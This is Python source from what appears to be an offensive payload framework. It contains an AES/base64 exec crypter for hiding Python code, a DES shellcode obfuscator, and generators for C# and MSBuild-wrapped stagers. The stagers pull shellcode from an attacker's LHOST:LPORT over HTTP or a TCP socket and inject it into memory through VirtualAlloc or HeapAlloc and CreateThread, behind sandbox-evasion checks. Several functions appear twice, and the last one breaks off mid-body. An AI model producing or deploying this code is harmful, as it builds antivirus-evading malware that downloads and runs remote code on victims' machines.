def pyherion(code):
    """
    Generates a crypted hyperion'esque version of python code using
    base64 and AES with a random key, wrapped in an exec() dynamic launcher.

    code = the python source code to encrypt

    Returns the encrypted python code as a string.
    """

    imports = list()
    codebase = list()

    # strip out all imports from the code so pyinstaller can properly
    # launch the code by preimporting everything at compiletime
    for line in code.split("\n"):
        if not line.startswith("#"):  # ignore commented imports...
            if "import" in line:
                imports.append(line)
            else:
                codebase.append(line)

    # encrypt the input file (less the imports)
    encrypted_code, key, iv = aes_encryption("\n".join(codebase),
                                             encryption_pad='{')
    encrypted_code = encrypted_code.decode('ascii')

    # some random variable names
    b64var = helpers.randomString()
    aesvar = helpers.randomString()

    # randomize our base64 and AES importing variable
    imports.append("from base64 import b64decode as " + b64var)
    imports.append("from Crypto.Cipher import AES as " + aesvar)

    # shuffle up our imports
    random.shuffle(imports)

    # add in the AES imports and any imports found in the file
    crypted = ";".join(imports) + "\n"

    # the exec() launcher for our base64'ed encrypted string
    to_be_encoded = "exec(" + aesvar + ".new(\"" + key + "\", " + aesvar + ".MODE_CBC, \"" + iv + "\").decrypt(" + b64var + "(\"" + encrypted_code + "\")).rstrip(b'{'))\n"
    to_be_encoded = to_be_encoded.encode()
    encoded_script = base64.b64encode(to_be_encoded).decode('ascii')
    crypted += "exec(" + b64var + "(\"" + encoded_script + "\"))"

    return crypted
def pyherion(code):
    """
    Generates a crypted hyperion'esque version of python code using
    base64 and AES with a random key, wrapped in an exec() dynamic launcher.

    code = the python source code to encrypt

    Returns the encrypted python code as a string.
    """

    imports = list()
    codebase = list()

    # strip out all imports from the code so pyinstaller can properly
    # launch the code by preimporting everything at compiletime
    for line in code.split("\n"):
        if not line.startswith("#"): # ignore commented imports...
            if "import" in line:
                imports.append(line)
            else:
                codebase.append(line)

    # encrypt the input file (less the imports)
    encrypted_code, key, iv = aes_encryption("\n".join(codebase), encryption_pad='{')
    encrypted_code = encrypted_code.decode('ascii')

    # some random variable names
    b64var = helpers.randomString()
    aesvar = helpers.randomString()

    # randomize our base64 and AES importing variable
    imports.append("from base64 import b64decode as " + b64var)
    imports.append("from Crypto.Cipher import AES as " + aesvar)

    # shuffle up our imports
    random.shuffle(imports)

    # add in the AES imports and any imports found in the file
    crypted = ";".join(imports) + "\n"

    # the exec() launcher for our base64'ed encrypted string
    to_be_encoded = "exec(" + aesvar + ".new(\"" + key + "\", " + aesvar + ".MODE_CBC, \"" + iv + "\").decrypt(" + b64var + "(\"" + encrypted_code + "\")).rstrip(b'{'))\n"
    to_be_encoded = to_be_encoded.encode()
    encoded_script = base64.b64encode(to_be_encoded).decode('ascii')
    crypted += "exec(" + b64var + "(\"" + encoded_script + "\"))"

    return crypted
def des_encryption(incoming_shellcode):
    """
    Encrypt a byte string with single DES in CBC mode and base64-encode the result.

    incoming_shellcode = the raw bytes to encrypt; encryption_padding() is applied
                         to them before the cipher sees them

    Returns a 3-tuple (encoded_ciphertext, random_des_key, iv):
      encoded_ciphertext - the ciphertext as base64 (bytes, from base64.b64encode)
      random_des_key     - the freshly generated key passed to DES.new()
      iv                 - the freshly generated CBC initialisation vector

    NOTE(review): the key and IV are handed back right next to the ciphertext,
    so this only hides the bytes from casual inspection; whoever holds the tuple
    (or whatever the caller embeds it in) can decrypt it directly. Single DES is
    also an obsolete cipher. Neither point makes this a confidentiality control.
    """
    # Generate a random key, create the cipher object
    # pad the shellcode, and encrypt the padded shellcode
    # return encrypted -> encoded shellcode and key
    #
    # 8 is DES's key and block size. helpers.randomKey()/randomString() are
    # project helpers, so whether they return str or bytes is not visible here;
    # confirm against what the DES library in use accepts.
    random_des_key = helpers.randomKey(8)
    iv = helpers.randomString(8)
    des_cipher_object = DES.new(random_des_key, DES.MODE_CBC, iv)
    # encryption_padding() is defined elsewhere; presumably pads to a multiple
    # of the 8-byte block as CBC requires - verify there.
    padded_shellcode = encryption_padding(incoming_shellcode)
    encrypted_shellcode = des_cipher_object.encrypt(padded_shellcode)
    encoded_ciphertext = base64.b64encode(encrypted_shellcode)
    return encoded_ciphertext, random_des_key, iv
def des_encryption(incoming_shellcode):
    """
    Encrypt a byte string with single DES in CBC mode and base64-encode the result.

    incoming_shellcode = the raw bytes to encrypt; encryption_padding() is applied
                         to them before the cipher sees them

    Returns a 3-tuple (encoded_ciphertext, random_des_key, iv):
      encoded_ciphertext - the ciphertext as base64 (bytes, from base64.b64encode)
      random_des_key     - the freshly generated key passed to DES.new()
      iv                 - the freshly generated CBC initialisation vector

    NOTE(review): the key and IV are handed back right next to the ciphertext,
    so this only hides the bytes from casual inspection; whoever holds the tuple
    (or whatever the caller embeds it in) can decrypt it directly. Single DES is
    also an obsolete cipher. Neither point makes this a confidentiality control.
    """
    # Generate a random key, create the cipher object
    # pad the shellcode, and encrypt the padded shellcode
    # return encrypted -> encoded shellcode and key
    #
    # 8 is DES's key and block size. helpers.randomKey()/randomString() are
    # project helpers, so whether they return str or bytes is not visible here;
    # confirm against what the DES library in use accepts.
    random_des_key = helpers.randomKey(8)
    iv = helpers.randomString(8)
    des_cipher_object = DES.new(random_des_key, DES.MODE_CBC, iv)
    # encryption_padding() is defined elsewhere; presumably pads to a multiple
    # of the 8-byte block as CBC requires - verify there.
    padded_shellcode = encryption_padding(incoming_shellcode)
    encrypted_shellcode = des_cipher_object.encrypt(padded_shellcode)
    encoded_ciphertext = base64.b64encode(encrypted_shellcode)
    return encoded_ciphertext, random_des_key, iv
    def generate(self):

        # imports and namespace setup
        payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Linq; using System.Runtime.InteropServices;\n"
        payload_code += "namespace %s { class %s {\n" % (
            helpers.randomString(), helpers.randomString())

        # code for the randomString() function
        randomStringName = helpers.randomString()
        bufferName = helpers.randomString()
        charsName = helpers.randomString()
        t = list(
            "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789")
        random.shuffle(t)
        chars = ''.join(t)

        payload_code += "static string %s(Random r, int s) {\n" % (
            randomStringName)
        payload_code += "char[] %s = new char[s];\n" % (bufferName)
        payload_code += "string %s = \"%s\";\n" % (charsName, chars)
        payload_code += "for (int i = 0; i < s; i++){ %s[i] = %s[r.Next(%s.Length)];}\n" % (
            bufferName, charsName, charsName)
        payload_code += "return new string(%s);}\n" % (bufferName)

        # code for the checksum8() function
        checksum8Name = helpers.randomString()
        payload_code += "static bool %s(string s) {return ((s.ToCharArray().Select(x => (int)x).Sum()) %% 0x100 == 92);}\n" % (
            checksum8Name)

        # code fo the genHTTPChecksum() function
        genHTTPChecksumName = helpers.randomString()
        baseStringName = helpers.randomString()
        randCharsName = helpers.randomString()
        urlName = helpers.randomString()
        random.shuffle(t)
        randChars = ''.join(t)

        payload_code += "static string %s(Random r) { string %s = \"\";\n" % (
            genHTTPChecksumName, baseStringName)
        payload_code += "for (int i = 0; i < 64; ++i) { %s = %s(r, 3);\n" % (
            baseStringName, randomStringName)
        payload_code += "string %s = new string(\"%s\".ToCharArray().OrderBy(s => (r.Next(2) %% 2) == 0).ToArray());\n" % (
            randCharsName, randChars)
        payload_code += "for (int j = 0; j < %s.Length; ++j) {\n" % (
            randCharsName)
        payload_code += "string %s = %s + %s[j];\n" % (urlName, baseStringName,
                                                       randCharsName)
        payload_code += "if (%s(%s)) {return %s;}}} return \"9vXU\";}" % (
            checksum8Name, urlName, urlName)

        # code for getData() function
        getDataName = helpers.randomString()
        strName = helpers.randomString()
        webClientName = helpers.randomString()
        sName = helpers.randomString()

        payload_code += "static byte[] %s(string %s) {\n" % (getDataName,
                                                             strName)
        payload_code += "WebClient %s = new System.Net.WebClient();\n" % (
            webClientName)
        payload_code += "%s.Headers.Add(\"User-Agent\", \"Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\");\n" % (
            webClientName)
        payload_code += "%s.Headers.Add(\"Accept\", \"*/*\");\n" % (
            webClientName)
        payload_code += "%s.Headers.Add(\"Accept-Language\", \"en-gb,en;q=0.5\");\n" % (
            webClientName)
        payload_code += "%s.Headers.Add(\"Accept-Charset\", \"ISO-8859-1,utf-8;q=0.7,*;q=0.7\");\n" % (
            webClientName)
        payload_code += "byte[] %s = null;\n" % (sName)
        payload_code += "try { %s = %s.DownloadData(%s);\n" % (
            sName, webClientName, strName)
        payload_code += "if (%s.Length < 100000) return null;}\n" % (sName)
        payload_code += "catch (WebException) {}\n"
        payload_code += "return %s;}\n" % (sName)

        # code fo the inject() function to inject shellcode
        injectName = helpers.randomString()
        sName = helpers.randomString()
        funcAddrName = helpers.randomString()
        hThreadName = helpers.randomString()
        threadIdName = helpers.randomString()
        pinfoName = helpers.randomString()

        if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
            payload_code += "static void %s(byte[] %s) {\n" % (injectName,
                                                               sName)
            payload_code += "    if (%s != null) {\n" % (sName)
            payload_code += "        UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % (
                funcAddrName, sName)
            payload_code += "        Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % (
                sName, funcAddrName, sName)
            payload_code += "        IntPtr %s = IntPtr.Zero;\n" % (
                hThreadName)
            payload_code += "        UInt32 %s = 0;\n" % (threadIdName)
            payload_code += "        IntPtr %s = IntPtr.Zero;\n" % (pinfoName)
            payload_code += "        %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % (
                hThreadName, funcAddrName, pinfoName, threadIdName)
            payload_code += "        WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" % (
                hThreadName)

        elif self.required_options["INJECT_METHOD"][0].lower() == "heap":

            payload_code += "static void %s(byte[] %s) {\n" % (injectName,
                                                               sName)
            payload_code += "    if (%s != null) {\n" % (sName)
            payload_code += '       UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format(
                pinfoName, sName)
            payload_code += '       UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format(
                funcAddrName, pinfoName, sName)
            payload_code += '       RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format(
                funcAddrName, sName, sName)
            payload_code += '       UInt32 {} = 0;\n'.format(threadIdName)
            payload_code += '       IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format(
                hThreadName, funcAddrName, threadIdName)
            payload_code += '       WaitForSingleObject({}, 0xFFFFFFFF);}}}}\n'.format(
                hThreadName)

        # code for Main() to launch everything
        sName = helpers.randomString()
        randomName = helpers.randomString()
        curlyCount = 0

        payload_code += "static void Main(){\n"

        if self.required_options["EXPIRE_PAYLOAD"][0].lower() != "x":

            RandToday = helpers.randomString()
            RandExpire = helpers.randomString()

            # Create Payload code
            payload_code += '\t' * curlyCount + 'DateTime {} = DateTime.Today;\n'.format(
                RandToday)
            payload_code += '\t' * curlyCount + 'DateTime {} = {}.AddDays({});\n'.format(
                RandExpire, RandToday,
                self.required_options["EXPIRE_PAYLOAD"][0])
            payload_code += '\t' * curlyCount + 'if ({} < {}) {{\n'.format(
                RandExpire, RandToday)

            # Add a tab for this check
            curlyCount += 1

        if self.required_options["HOSTNAME"][0].lower() != "x":

            payload_code += '\t' * curlyCount + 'if (System.Environment.MachineName.ToLower().Contains("{}")) {{\n'.format(
                self.required_options["HOSTNAME"][0].lower())

            # Add a tab for this check
            curlyCount += 1

        if self.required_options["DOMAIN"][0].lower() != "x":

            payload_code += '\t' * curlyCount + 'if (System.Environment.MachineName.ToLower() != System.Environment.UserDomainName.ToLower()) {\n'

            # Add a tab for this check
            curlyCount += 1

        if self.required_options["PROCESSORS"][0].lower() != "x":

            payload_code += '\t' * curlyCount + 'if (System.Environment.ProcessorCount > {}) {{\n'.format(
                self.required_options["PROCESSORS"][0])

            # Add a tab for this check
            curlyCount += 1

        if self.required_options["USERNAME"][0].lower() != "x":

            rand_user_name = helpers.randomString()
            rand_char_name = helpers.randomString()

            payload_code += '\t' * curlyCount + 'string {} = System.Security.Principal.WindowsIdentity.GetCurrent().Name;\n'.format(
                rand_user_name)
            payload_code += '\t' * curlyCount + "string[] {} = {}.Split('\\\\');\n".format(
                rand_char_name, rand_user_name)
            payload_code += '\t' * curlyCount + 'if ({}[1].Contains("{}")) {{\n\n'.format(
                rand_char_name, self.required_options["USERNAME"][0])

            # Add a tab for this check
            curlyCount += 1

        payload_code += "Random %s = new Random((int)DateTime.Now.Ticks);\n" % (
            randomName)
        payload_code += "byte[] %s = %s(\"http://%s:%s/\" + %s(%s));\n" % (
            sName, getDataName, self.required_options["LHOST"][0],
            self.required_options["LPORT"][0], genHTTPChecksumName, randomName)
        payload_code += "%s(%s);}\n" % (injectName, sName)

        while (curlyCount != 0):
            payload_code += '\t' * curlyCount + '}'
            curlyCount -= 1

        # get random variables for the API imports
        r = [helpers.randomString() for x in range(12)]
        y = [helpers.randomString() for x in range(17)]
        if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
            payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n""" % (
                r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9],
                r[10], r[11])
        elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
            payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);}}\n""" % (
                y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9],
                y[10], y[11], y[12], y[13], y[14], y[15], y[16])

        if self.required_options["USE_ARYA"][0].lower() == "y":
            payload_code = encryption.arya(payload_code)

        self.payload_source_code = payload_code
        return
    def generate(self):
        # MSBuild specific variables
        targetName = bypass_helpers.randomString()
        className = bypass_helpers.randomString()
        # get 12 random variables for the API imports
        r = [bypass_helpers.randomString() for x in range(12)]
        y = [bypass_helpers.randomString() for x in range(17)]
        # The header for MSBuild XML files
        # TODO: Fix the awful formatting
        msbuild_header = """<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">\n<!-- C:\Windows\Microsoft.NET\Framework\\v4.0.30319\msbuild.exe SimpleTasks.csproj -->\n\t<Target Name="{0}">
            <{1} />
          </Target>
          <UsingTask
            TaskName="{1}"
            TaskFactory="CodeTaskFactory"
            AssemblyFile="C:\Windows\Microsoft.Net\Framework\\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
            <Task>

              <Code Type="Class" Language="cs">
              <![CDATA[
        """.format(targetName, className)
        # imports and namespace setup
        payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Linq; using System.Runtime.InteropServices; using System.Threading; using Microsoft.Build.Framework; using Microsoft.Build.Utilities;\n"
        payload_code += "public class %s : Task, ITask {\n" % (className)
        if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
            payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);\n""" % (
                r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9],
                r[10], r[11])
        elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
            payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);""" % (
                y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9],
                y[10], y[11], y[12], y[13], y[14], y[15], y[16])

        # code for the randomString() function
        randomStringName = bypass_helpers.randomString()
        bufferName = bypass_helpers.randomString()
        charsName = bypass_helpers.randomString()
        t = list(
            "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789")
        random.shuffle(t)
        chars = ''.join(t)

        # code for the randomString() method
        payload_code += "static string %s(Random r, int s) {\n" % (
            randomStringName)
        payload_code += "char[] %s = new char[s];\n" % (bufferName)
        payload_code += "string %s = \"%s\";\n" % (charsName, chars)
        payload_code += "for (int i = 0; i < s; i++){ %s[i] = %s[r.Next(%s.Length)];}\n" % (
            bufferName, charsName, charsName)
        payload_code += "return new string(%s);}\n" % (bufferName)

        # code for the checksum8() function
        checksum8Name = bypass_helpers.randomString()
        payload_code += "static bool %s(string s) {return ((s.ToCharArray().Select(x => (int)x).Sum()) %% 0x100 == 92);}\n" % (
            checksum8Name)

        # code fo the genHTTPChecksum() function
        genHTTPChecksumName = bypass_helpers.randomString()
        baseStringName = bypass_helpers.randomString()
        randCharsName = bypass_helpers.randomString()
        urlName = bypass_helpers.randomString()
        random.shuffle(t)
        randChars = ''.join(t)

        payload_code += "static string %s(Random r) { string %s = \"\";\n" % (
            genHTTPChecksumName, baseStringName)
        payload_code += "for (int i = 0; i < 64; ++i) { %s = %s(r, 3);\n" % (
            baseStringName, randomStringName)
        payload_code += "string %s = new string(\"%s\".ToCharArray().OrderBy(s => (r.Next(2) %% 2) == 0).ToArray());\n" % (
            randCharsName, randChars)
        payload_code += "for (int j = 0; j < %s.Length; ++j) {\n" % (
            randCharsName)
        payload_code += "string %s = %s + %s[j];\n" % (urlName, baseStringName,
                                                       randCharsName)
        payload_code += "if (%s(%s)) {return %s;}}} return \"9vXU\";}" % (
            checksum8Name, urlName, urlName)

        # code for getData() function
        getDataName = helpers.randomString()
        strName = helpers.randomString()
        webClientName = helpers.randomString()
        sName = helpers.randomString()

        payload_code += "static byte[] %s(string %s) {\n" % (getDataName,
                                                             strName)
        payload_code += "WebClient %s = new System.Net.WebClient();\n" % (
            webClientName)
        payload_code += "%s.Headers.Add(\"User-Agent\", \"Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\");\n" % (
            webClientName)
        payload_code += "%s.Headers.Add(\"Accept\", \"*/*\");\n" % (
            webClientName)
        payload_code += "%s.Headers.Add(\"Accept-Language\", \"en-gb,en;q=0.5\");\n" % (
            webClientName)
        payload_code += "%s.Headers.Add(\"Accept-Charset\", \"ISO-8859-1,utf-8;q=0.7,*;q=0.7\");\n" % (
            webClientName)
        payload_code += "byte[] %s = null;\n" % (sName)
        payload_code += "try { %s = %s.DownloadData(%s);\n" % (
            sName, webClientName, strName)
        payload_code += "if (%s.Length < 100000) return null;}\n" % (sName)
        payload_code += "catch (WebException) {}\n"
        payload_code += "return %s;}\n" % (sName)

        # code fo the inject() function to inject shellcode
        injectName = bypass_helpers.randomString()
        sName = bypass_helpers.randomString()
        funcAddrName = bypass_helpers.randomString()
        hThreadName = bypass_helpers.randomString()
        threadIdName = bypass_helpers.randomString()
        pinfoName = bypass_helpers.randomString()

        if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
            payload_code += "static void %s(byte[] %s) {\n" % (injectName,
                                                               sName)
            payload_code += "    if (%s != null) {\n" % (sName)
            payload_code += "        UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % (
                funcAddrName, sName)
            payload_code += "        Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % (
                sName, funcAddrName, sName)
            payload_code += "        IntPtr %s = IntPtr.Zero;\n" % (
                hThreadName)
            payload_code += "        UInt32 %s = 0;\n" % (threadIdName)
            payload_code += "        IntPtr %s = IntPtr.Zero;\n" % (pinfoName)
            payload_code += "        %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % (
                hThreadName, funcAddrName, pinfoName, threadIdName)
            payload_code += "        WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" % (
                hThreadName)

        elif self.required_options["INJECT_METHOD"][0].lower() == "heap":

            payload_code += "static void %s(byte[] %s) {\n" % (injectName,
                                                               sName)
            payload_code += "    if (%s != null) {\n" % (sName)
            payload_code += '       UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format(
                pinfoName, sName)
            payload_code += '       UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format(
                funcAddrName, pinfoName, sName)
            payload_code += '       RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format(
                funcAddrName, sName, sName)
            payload_code += '       UInt32 {} = 0;\n'.format(threadIdName)
            payload_code += '       IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format(
                hThreadName, funcAddrName, threadIdName)
            payload_code += '       WaitForSingleObject({}, 0xFFFFFFFF);}}}}\n'.format(
                hThreadName)

        # code for Main() to launch everything
        sName = bypass_helpers.randomString()
        randomName = bypass_helpers.randomString()
        num_tabs_required = 0

        payload_code2, num_tabs_required = gamemaker.senecas_games(self)
        payload_code = payload_code + payload_code2
        num_tabs_required += 2

        payload_code += "Random %s = new Random((int)DateTime.Now.Ticks);\n" % (
            randomName)
        payload_code += "byte[] %s = %s(\"http://%s:%s/\" + %s(%s));\n" % (
            sName, getDataName, self.required_options["LHOST"][0],
            self.required_options["LPORT"][0], genHTTPChecksumName, randomName)
        payload_code += "%s(%s);\n" % (injectName, sName)

        while (num_tabs_required != 0):
            if num_tabs_required == 2:
                # return true for the msbuild Execute() function
                payload_code += "\nreturn true;"
                payload_code += '\t' * num_tabs_required + '}'
                num_tabs_required -= 1
            else:
                payload_code += '\t' * num_tabs_required + '}'
                num_tabs_required -= 1

        payload_code += "\n\t\t\t\t]]>\n\t\t\t</Code>\n\t\t</Task>\n\t</UsingTask>\n</Project>"
        payload_code = msbuild_header + payload_code

        self.payload_source_code = payload_code
        return
    def generate(self):

        getDataName = helpers.randomString()
        injectName = helpers.randomString()
        targetName = bypass_helpers.randomString()
        className = bypass_helpers.randomString()

        # get 12 random variables for the API imports
        r = [helpers.randomString() for x in range(12)]
        y = [helpers.randomString() for x in range(17)]

        # The header for MSBuild XML files
        # TODO: Fix the awful formatting
        msbuild_header = """<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">\n<!-- C:\Windows\Microsoft.NET\Framework\\v4.0.30319\msbuild.exe SimpleTasks.csproj -->\n\t<Target Name="{0}">
            <{1} />
          </Target>
          <UsingTask
            TaskName="{1}"
            TaskFactory="CodeTaskFactory"
            AssemblyFile="C:\Windows\Microsoft.Net\Framework\\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
            <Task>

              <Code Type="Class" Language="cs">
              <![CDATA[
        """.format(targetName, className)
        payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Linq; using System.Runtime.InteropServices; using System.Threading; using Microsoft.Build.Framework; using Microsoft.Build.Utilities;\n"
        payload_code += "public class %s : Task, ITask {\n" % (className)
        if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
            payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);\n""" % (
                r[0], r[1], r[2], r[3], r[4], r[5], r[6], r[7], r[8], r[9],
                r[10], r[11])
        elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
            payload_code += """\t\t[DllImport(\"kernel32\")] private static extern UInt32 HeapCreate(UInt32 %s, UInt32 %s, UInt32 %s); \n[DllImport(\"kernel32\")] private static extern UInt32 HeapAlloc(UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 RtlMoveMemory(UInt32 %s, byte[] %s, UInt32 %s);\n[DllImport(\"kernel32\")] private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s, IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s);""" % (
                y[0], y[1], y[2], y[3], y[4], y[5], y[6], y[7], y[8], y[9],
                y[10], y[11], y[12], y[13], y[14], y[15], y[16])

        hostName = helpers.randomString()
        portName = helpers.randomString()
        ipName = helpers.randomString()
        sockName = helpers.randomString()
        length_rawName = helpers.randomString()
        lengthName = helpers.randomString()
        sName = helpers.randomString()
        total_bytesName = helpers.randomString()
        handleName = helpers.randomString()

        payload_code += "static byte[] %s(string %s, int %s) {\n" % (
            getDataName, hostName, portName)
        payload_code += "    IPEndPoint %s = new IPEndPoint(IPAddress.Parse(%s), %s);\n" % (
            ipName, hostName, portName)
        payload_code += "    Socket %s = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);\n" % (
            sockName)
        payload_code += "    try { %s.Connect(%s); }\n" % (sockName, ipName)
        payload_code += "    catch { return null;}\n"
        payload_code += "    byte[] %s = new byte[4];\n" % (length_rawName)
        payload_code += "    %s.Receive(%s, 4, 0);\n" % (sockName,
                                                         length_rawName)
        payload_code += "    int %s = BitConverter.ToInt32(%s, 0);\n" % (
            lengthName, length_rawName)
        payload_code += "    byte[] %s = new byte[%s + 5];\n" % (sName,
                                                                 lengthName)
        payload_code += "    int %s = 0;\n" % (total_bytesName)
        payload_code += "    while (%s < %s)\n" % (total_bytesName, lengthName)
        payload_code += "    { %s += %s.Receive(%s, %s + 5, (%s - %s) < 4096 ? (%s - %s) : 4096, 0);}\n" % (
            total_bytesName, sockName, sName, total_bytesName, lengthName,
            total_bytesName, lengthName, total_bytesName)
        payload_code += "    byte[] %s = BitConverter.GetBytes((int)%s.Handle);\n" % (
            handleName, sockName)
        payload_code += "    Array.Copy(%s, 0, %s, 1, 4); %s[0] = 0xBF;\n" % (
            handleName, sName, sName)
        payload_code += "    return %s;}\n" % (sName)

        sName = helpers.randomString()
        funcAddrName = helpers.randomString()
        hThreadName = helpers.randomString()
        threadIdName = helpers.randomString()
        pinfoName = helpers.randomString()

        if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
            payload_code += "static void %s(byte[] %s) {\n" % (injectName,
                                                               sName)
            payload_code += "    if (%s != null) {\n" % (sName)
            payload_code += "        UInt32 %s = VirtualAlloc(0, (UInt32)%s.Length, 0x1000, 0x40);\n" % (
                funcAddrName, sName)
            payload_code += "        Marshal.Copy(%s, 0, (IntPtr)(%s), %s.Length);\n" % (
                sName, funcAddrName, sName)
            payload_code += "        IntPtr %s = IntPtr.Zero;\n" % (
                hThreadName)
            payload_code += "        UInt32 %s = 0;\n" % (threadIdName)
            payload_code += "        IntPtr %s = IntPtr.Zero;\n" % (pinfoName)
            payload_code += "        %s = CreateThread(0, 0, %s, %s, 0, ref %s);\n" % (
                hThreadName, funcAddrName, pinfoName, threadIdName)
            payload_code += "        WaitForSingleObject(%s, 0xFFFFFFFF); }}\n" % (
                hThreadName)

        elif self.required_options["INJECT_METHOD"][0].lower() == "heap":

            payload_code += "static void %s(byte[] %s) {\n" % (injectName,
                                                               sName)
            payload_code += "    if (%s != null) {\n" % (sName)
            payload_code += '       UInt32 {} = HeapCreate(0x00040000, (UInt32){}.Length, 0);\n'.format(
                pinfoName, sName)
            payload_code += '       UInt32 {} = HeapAlloc({}, 0x00000008, (UInt32){}.Length);\n'.format(
                funcAddrName, pinfoName, sName)
            payload_code += '       RtlMoveMemory({}, {}, (UInt32){}.Length);\n'.format(
                funcAddrName, sName, sName)
            payload_code += '       UInt32 {} = 0;\n'.format(threadIdName)
            payload_code += '       IntPtr {} = CreateThread(0, 0, {}, IntPtr.Zero, 0, ref {});\n'.format(
                hThreadName, funcAddrName, threadIdName)
            payload_code += '       WaitForSingleObject({}, 0xFFFFFFFF);}}}}\n'.format(
                hThreadName)

        sName = helpers.randomString()
        num_tabs_required = 0

        payload_code2, num_tabs_required = gamemaker.senecas_games(self)
        payload_code = payload_code + payload_code2
        num_tabs_required += 2

        payload_code += "    byte[] %s = null; %s = %s(\"%s\", %s);\n" % (
            sName, sName, getDataName, self.required_options["LHOST"][0],
            self.required_options["LPORT"][0])
        payload_code += "    %s(%s);\n" % (injectName, sName)

        while (num_tabs_required != 0):
            if num_tabs_required == 2:
                # return true for the msbuild Execute() function
                payload_code += "\nreturn true;"
                payload_code += '\t' * num_tabs_required + '}'
                num_tabs_required -= 1
            else:
                payload_code += '\t' * num_tabs_required + '}'
                num_tabs_required -= 1

        payload_code += "\n\t\t\t\t]]>\n\t\t\t</Code>\n\t\t</Task>\n\t</UsingTask>\n</Project>"
        payload_code = msbuild_header + payload_code

